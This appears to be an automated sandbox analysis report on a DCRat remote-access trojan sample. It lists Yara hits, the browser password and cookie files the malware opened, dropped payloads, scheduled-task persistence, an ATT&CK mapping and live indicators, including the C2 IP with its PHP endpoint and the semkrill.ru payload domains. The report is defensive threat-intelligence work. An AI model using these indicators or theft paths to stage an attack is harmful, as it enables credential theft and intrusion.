                                    Source: Yara match | File source: 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara match | File source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED
                                    Source: Yara match | File source: gorkmTnChA.exe, type: SAMPLE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.5218700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 11.0.webDriverintoDll.exe.4e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.68dd700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.68dd700.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.gorkmTnChA.exe.2c2170f.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.45797b.3.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.45797b.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara match | File source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                    Remote Access Functionality

                                    Source: Yara match | File source: 00000024.00000002.2899943903.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 0000000B.00000002.1853703523.0000000012EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: Process Memory Space: webDriverintoDll.exe PID: 7364, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: KAdpNCgonFhCnlBRasdZerWl.exe PID: 8028, type: MEMORYSTR
                                    Source: Yara match | File source: gorkmTnChA.exe, type: SAMPLE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.5218700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 11.0.webDriverintoDll.exe.4e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.68dd700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.68dd700.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.gorkmTnChA.exe.2c2170f.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.45797b.3.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.45797b.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000001.00000003.1656268229.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000001.00000003.1655715436.000000000688F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 0000000B.00000000.1775306001.00000000004E2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara match | File source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED
                                    Source: Yara match | File source: gorkmTnChA.exe, type: SAMPLE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.5218700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 11.0.webDriverintoDll.exe.4e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.68dd700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.68dd700.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.gorkmTnChA.exe.2c2170f.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.45797b.3.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.45797b.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara match | File source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED

                                    ATT&CK matrix (a number in parentheses is the count of signatures matched for that technique):

                                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                                    | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                                    | Gather Victim Identity Information | Scripting (11) | Replication Through Removable Media (1) | Windows Management Instrumentation (241) | Scripting (11) | DLL Side-Loading (1) | Disable or Modify Tools (1) | OS Credential Dumping (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                                    | Credentials | Domains | Default Accounts | Native API (1) | DLL Side-Loading (1) | Process Injection (13) | Deobfuscate/Decode Files or Information (11) | LSASS Memory | Peripheral Device Discovery (11) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service |
                                    | Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (12) | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Obfuscated Files or Information (3) | Security Account Manager | Account Discovery (1) | SMB/Windows Admin Shares | Clipboard Data (1) | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact |
                                    | Employee Names | Virtual Private Server | Local Accounts | Scheduled Task/Job (1) | Login Hook | Login Hook | Software Packing (11) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Application Layer Protocol (14) | Traffic Duplication | Data Destruction |
                                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Timestomp (1) | LSA Secrets | System Information Discovery (158) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Query Registry (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (13) | DCSync | Security Software Discovery (371) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                                    Virtualization/Sandbox Evasion
                                    Proc Filesystem2
                                    Process Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt13
                                    Process Injection
                                    /etc/passwd and /etc/shadow251
                                    Virtualization/Sandbox Evasion
                                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                                    Application Window Discovery
                                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                                    System Owner/User Discovery
                                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
Behavior Graph (rendered as a node list; each entry is the node number, its label, and the edge from its parent node; "started" marks a process launch, "dropped" a file written by that process; the number after a process name is the count from the legend):

• 2: Behavior Graph ID: 1570976, Sample: gorkmTnChA.exe, Startdate: 08/12/2024, Architecture: WINDOWS, Score: 100 (start node)
• 102: cdn.semkrill.ru (2->102)
• 112: Suricata IDS alerts for network traffic (2->112)
• 114: Found malware configuration (2->114)
• 116: Antivirus detection for dropped file (2->116)
• 118: 12 other signatures (2->118)
• 12: gorkmTnChA.exe 3 (2->12) started
• 15: KAdpNCgonFhCnlBRasdZerWl.exe (2->15) started
• 19: msiexec.exe (2->19) started
• 21: KAdpNCgonFhCnlBRasdZerWl.exe (2->21) started
• 90: C:\Users\...\SandeLLoCHECKER_Installer.exe, PE32 (12->90) dropped
• 92: C:\Users\user\AppData\...\DCRatBuild.exe, PE32 (12->92) dropped
• 23: DCRatBuild.exe 3 6 (12->23) started
• 27: SandeLLoCHECKER_Installer.exe 46 (12->27) started
• 106: 185.246.67.73, 49743, 49744, 49745 THEFIRST-ASRU Russian Federation (15->106)
• 94: C:\Users\user\Desktop\zbqSUreo.log, PE32 (15->94) dropped
• 96: C:\Users\user\Desktop\vlAbNuev.log, PE32 (15->96) dropped
• 98: C:\Users\user\Desktop\vSFbtVsB.log, PE32 (15->98) dropped
• 100: 15 other malicious files (15->100) dropped
• 108: Tries to harvest and steal browser information (history, passwords, etc) (15->108)
• 30: msiexec.exe (19->30) started
• 32: msiexec.exe (19->32) started
• 72: C:\...\webDriverintoDll.exe, PE32 (23->72) dropped
• 120: Antivirus detection for dropped file (23->120)
• 122: Multi AV Scanner detection for dropped file (23->122)
• 124: Machine Learning detection for dropped file (23->124)
• 34: wscript.exe 1 (23->34) started
• 104: cdn.semkrill.ru 172.67.184.109, 443, 49730 CLOUDFLARENETUS United States (27->104)
• 74: C:\Users\user\AppData\Local\...\MSI47C9.tmp, PE32 (27->74) dropped
• 76: C:\Users\user\AppData\Local\...\MSI46ED.tmp, PE32 (27->76) dropped
• 78: C:\Users\user\AppData\Local\...\MSI44B9.tmp, PE32 (27->78) dropped
• 80: 5 other files (4 malicious) (27->80) dropped
• 37: msiexec.exe 11 (27->37) started
• 110: Windows Scripting host queries suspicious COM object (likely to drop second stage) (34->110)
• 40: cmd.exe 1 (34->40) started
• 64: C:\Users\user\AppData\Local\...\MSI4DD5.tmp, PE32 (37->64) dropped
• 66: C:\Users\user\AppData\Local\...\MSI4DB5.tmp, PE32 (37->66) dropped
• 68: C:\Users\user\AppData\Local\...\MSI4D85.tmp, PE32 (37->68) dropped
• 70: 5 other malicious files (37->70) dropped
• 42: webDriverintoDll.exe 3 34 (40->42) started
• 46: conhost.exe (40->46) started
• 82: C:\...\KAdpNCgonFhCnlBRasdZerWl.exe, PE32 (42->82) dropped
• 84: C:\Users\user\Desktop\yYksYVbT.log, PE32 (42->84) dropped
• 86: C:\Users\user\Desktop\xqfrsuNN.log, PE32 (42->86) dropped
• 88: 21 other malicious files (42->88) dropped
• 126: Multi AV Scanner detection for dropped file (42->126)
• 128: Uses schtasks.exe or at.exe to add and modify task schedules (42->128)
• 130: Creates processes via WMI (42->130)
• 48: cmd.exe (42->48) started
• 50: schtasks.exe (42->50) started
• 52: schtasks.exe (42->52) started
• 54: 13 other processes (42->54)
• 56: conhost.exe (48->56) started
• 58: chcp.com (48->58) started
• 60: w32tm.exe (48->60) started
• 62: KAdpNCgonFhCnlBRasdZerWl.exe (48->62) started

Source | Detection | Scanner | Label | Link
gorkmTnChA.exe | 100% | ReversingLabs | Win32.Trojan.DCRat |
gorkmTnChA.exe | 100% | Avira | VBS/Runner.VPG |
gorkmTnChA.exe | 100% | Avira | VBS/Runner.VPG |
gorkmTnChA.exe | 100% | Avira | TR/Redcap.apero |
gorkmTnChA.exe | 100% | Avira | HEUR/AGEN.1323342 |
gorkmTnChA.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 100% | Avira | VBS/Runner.VPG |
C:\Users\Default\Favorites\ApplicationFrameHost.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\BXyiPEuJ.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Users\user\Desktop\ClgJzaDG.log | 100% | Avira | HEUR/AGEN.1362695 |
C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat | 100% | Avira | BAT/Delbat.C |
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | 100% | Avira | TR/Redcap.apero |
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 100% | Joe Sandbox ML | |
C:\Users\Default\Favorites\ApplicationFrameHost.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\BXyiPEuJ.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\ClgJzaDG.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\AOGsABiv.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Users\Default\Favorites\ApplicationFrameHost.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\lzmaextractor.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 63% | ReversingLabs | Win32.Trojan.DCRat |
C:\Users\user\AppData\Local\Temp\MSI43FC.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI447A.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI44B9.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI46ED.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI47C9.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI4969.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI4A36.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI4A94.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI4B03.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI4C8A.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI4D85.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI4DB5.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI4DD5.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | 50% | ReversingLabs | Win32.Trojan.Malgent |
C:\Users\user\AppData\Local\Temp\shi436E.tmp | 0% | ReversingLabs | |
C:\Users\user\Desktop\AOGsABiv.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\BXyiPEuJ.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\ClgJzaDG.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\GKQhrBJx.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\JrPikvxc.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\LMwQZDoR.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\MAAYLQkP.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\OWmHElNj.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\OfhhMrNQ.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\SEFybwug.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\SFtfhzmX.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\UplOiJFY.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\UvPgJftz.log | 29% | ReversingLabs | |
C:\Users\user\Desktop\XaQepXPR.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\XgvwQtEs.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\YTLXwDIz.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\ZkmfqpvS.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\aHPfiQDx.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\dYYVtYJg.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\gaqNoVOB.log | 5% | ReversingLabs | |
C:\Users\user\Desktop\hwUMgwXg.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\jLWdviZu.log | 4% | ReversingLabs | |
C:\Users\user\Desktop\jUtdfVsr.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\jyGvCfcb.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\lKQdHBzT.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\lNILRSep.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\lealJKxT.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\nBMUCfZn.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\pAGUOyAM.log | 5% | ReversingLabs | |
C:\Users\user\Desktop\uAoBkxMT.log | 29% | ReversingLabs | |
C:\Users\user\Desktop\vSFbtVsB.log | 4% | ReversingLabs | |
C:\Users\user\Desktop\vlAbNuev.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\wKKCkQsU.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\xqfrsuNN.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\yYksYVbT.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\zbqSUreo.log | 8% | ReversingLabs | |
C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
                                    No Antivirus matches
                                    No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.246.67.73d | 0% | Avira URL Cloud | safe |
https://discord.semkrill.ru/= | 0% | Avira URL Cloud | safe |
https://semkrill.ru/contact(5h | 0% | Avira URL Cloud | safe |
https://semkrill.ru/contact( | 0% | Avira URL Cloud | safe |
https://discord.semkrill.ru/ | 0% | Avira URL Cloud | safe |
http://185.246.67.73 | 0% | Avira URL Cloud | safe |
http://185.246H | 0% | Avira URL Cloud | safe |
https://semkrill.ru/supporth1h | 0% | Avira URL Cloud | safe |
https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z4p | 0% | Avira URL Cloud | safe |
https://discord.semkrill.ru/AI_CLEAN_RESOURCES_USER_PROMPT_BASIC_UI0AI_APP_FILE | 0% | Avira URL Cloud | safe |
https://semkrill.ru/supportAI_SHORTCUTTABLE_FLAGSCOLUMNAQAAAA8AAABTAGEAbgBkAGUATABMAG8AQwBIAEUAQwBLA | 0% | Avira URL Cloud | safe |
https://semkrill.ru/support | 0% | Avira URL Cloud | safe |
https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z | 0% | Avira URL Cloud | safe |
https://sandello.ru | 0% | Avira URL Cloud | safe |
https://semkrill.ru/contact | 0% | Avira URL Cloud | safe |
https://discord.semkrill.ru/h | 0% | Avira URL Cloud | safe |
https://semkrill.ru/contactWindowsTypeNT40DisplayWindows | 0% | Avira URL Cloud | safe |
https://semkrill.ru/supporthPh | 0% | Avira URL Cloud | safe |
https://semkrill.ru/supportEY | 0% | Avira URL Cloud | safe |
https://discord.semkrill.ru/g | 0% | Avira URL Cloud | safe |
http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php | 0% | Avira URL Cloud | safe |
http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdat | 0% | Avira URL Cloud | safe |
https://cdn.semkrill.ru/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn.semkrill.ru | 172.67.184.109 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z | true | Avira URL Cloud: safe | unknown
http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.dr | false | | high
http://www.fontbureau.com/designersG | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.dr | false | | high
http://www.fontbureau.com/designers/? | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmp | false | | high
